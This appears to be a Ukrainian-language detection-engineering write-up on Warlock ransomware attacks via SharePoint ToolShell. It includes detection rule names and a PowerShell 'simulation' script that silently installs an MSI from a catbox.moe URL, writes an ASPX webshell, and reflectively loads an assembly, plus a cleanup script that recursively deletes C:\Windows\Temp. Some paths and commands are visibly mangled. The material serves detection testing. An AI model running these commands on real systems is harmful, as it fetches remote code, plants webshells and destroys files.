Атаки з використанням програм-вимагачів Warlock на критично важливу водну та телекомунікаційну інфраструктуру
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Загроза з Китаю, відома як Longlegs, використовує вразливості Microsoft SharePoint для розгортання програм-здирників Warlock. Група використовує ланцюг експлойтів ToolShell для початкового доступу, а потім переміщується стороною по скомпрометованих мережах. Зловмисники також застосовують передові методи ухилення, зокрема використовуючи вразливі драйвери для відключення програм безпеки і легітимні хмарні сервіси для доставки шкідливого ПЗ.
Розслідування
Розслідування простежило активність від початкової експлуатації SharePoint до розгортання вебшелла в каталозі LAYOUTS. Аналітики спостерігали за використанням підроблених ключів машини ASP.NET для віддаленого виконання коду та зберігання програм-здирників у спільному доступі SYSVOL для поширення по всьому домену. Ланцюг атаки також включав завантаження DLL та неправильне використання можливостей тунелювання Visual Studio Code для стійкого доступу.
Захист
Організації слід надавати пріоритет у виправленні серверів Microsoft SharePoint для усунення відомих вразливостей ToolShell. Впровадження строгих контролів над підписаними, але вразливими драйверами може допомогти запобігти атакам BYOVD. Команди з безпеки також повинні стежити за аномальним використанням інструментів living-off-the-land та обмежувати доступ до спільного доступу SYSVOL для попередження небезпечної активності, щоб зменшити бічний рух і розгортання програм-здирників.
Відповідь
Коли виявляється шкідлива активність, співробітники з інцидентів повинні ізолювати уражені сервери SharePoint та перевірити SYSVOL спільний доступ на незареєстровані скрипти або бінарні файли. Проведіть комплексний аудит облікових записів у домені, зосереджуючись на незареєстрованих доповненнях до локальної групи адміністраторів. Перевірте мережевий трафік на наявність вихідних з’єднань із сервісами обміну файлами, такими як catbox.moe або wasabisys.com, які використовуються для зберігання шкідливого ПЗ.
Процес атаки
Виявлення
Додано користувача до локальних адміністраторів (через cmdline)
Завантаження або завантаження через Powershell (через cmdline)
Підозрілі рядки в Powershell (через cmdline)
Виклик підозрілих класів/методів .NET з командного рядка Powershell (через process_creation)
Можливе виявлення спільного доступу до мережі (через cmdline)
Виявлення підозрілих доменних довіреностей (через cmdline)
Можлива спроба встановлення віддаленого MSI файлу (через cmdline)
Підозріле виконання з громадського профілю користувача (через process_creation)
Підозрілі рядки в Powershell (через powershell)
Виклик підозрілих методів .NET з Powershell (через powershell)
Можливе створення вебшелла в каталогах Microsoft Exchange / Sharepoint (через file_event)
Підозрілі файли в громадському профілі користувача (через file_event)
Можливе проникнення/виведення даних/управління C2 через сторонні сервіси/інструменти (через proxy)
Можливе проникнення/виведення даних/управління C2 через сторонні сервіси/інструменти (через dns)
Підозрілі команди та управління за запитом до домену Out-of-Band взаємодій (через dns)
IOC (HashSha256) для виявлення: Зловмисники програми-здирника Warlock б’ють по операторах води та телекомунікацій
Виявлення шкідливої команди PowerShell для виконання коду [Windows Powershell]
Інсценування і виконання програми-здирника Warlock через спільний доступ до мережі [Windows File Event]
Індикатори програми-здирника Warlock на серверах SharePoint [Windows Process Creation]
Імітація виконання
Передумова: Перевірка телеметрії та базової конфігурації повинна бути пройдена.
Обґрунтування: У цьому розділі детально описується точне виконання техніки супротивника (TTP) для активації правила виявлення. Команди та наратив МАЮТЬ прямо відображати ідентифіковані TTP та мають на меті генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або нерелевантні приклади призведуть до неправильного діагнозу.
-
Наратив атаки та команди: Супротивник прагне розгорнути програму-здирник Warlock на сервері SharePoint. Атака починається з використання
msiexecдля завантаження шкідливого MSI з віддаленого домену, контрольованого атакуючим (catbox.moe). Після початкової фили греблі, зловмисник використовує PowerShell для запису шкідливого ASPX вебшелла в SharePointlayout2sp.aspxшлях із використанням Base64 закодованого навантаження, щоб обійти прості текстові фільтри. Нарешті, нападник намагається завантажити шкідливу .NET збірку безпосередньо в пам’ять за допомогоюSystem.Workflow.ComponentModelдля виконання коду без залишення слідів файлу на диску. -
Скрипт регресійного тестування:
# Скрипт симуляції програми-здирника Warlock # ПРИМІТКА: Цей скрипт призначений лише для авторизованих тестових цілей. Write-Host "[!] Запуск симуляції програми-здирника Warlock..." -ForegroundColor Red # 1. Симулюйте MSIEXEC віддалене завантаження (Вибір 3) Write-Host "[*] Симулюю віддалене завантаження MSIEXEC..." Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue # 2. Симулюйте PowerShell ASPX вебшелл падіння (Вибір 1) # Ми використовуємо точний рядок з правила для забезпечення виявлення Write-Host "[*] Симулюю PowerShell вебшелл падіння через Base64..." $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))""" Invoke-Expression $cmd1 # 3. Симулюйте відображене завантаження збірки (Вибір 2) Write-Host "[*] Симулюю відображене завантаження збірки..." $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel" Invoke-Expression $cmd2 Write-Host "[+] Команди симуляції передані." -ForegroundColor Green -
Команди очищення:
# Скрипт очищення для видалення артефактів, створених під час симуляції Write-Host "[!] Очищення артефактів симуляції..." -ForegroundColor Yellow # Видаліть змодельовані файли (Примітка: У реальному тесті ви б націлилися на конкретні шляхи, створені) # Оскільки ми використовували фіктивні рядки, ми в основному переконуємося, що жодні справжні шкідливі файли не були скинуті. Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Очищення завершено." -ForegroundColor Green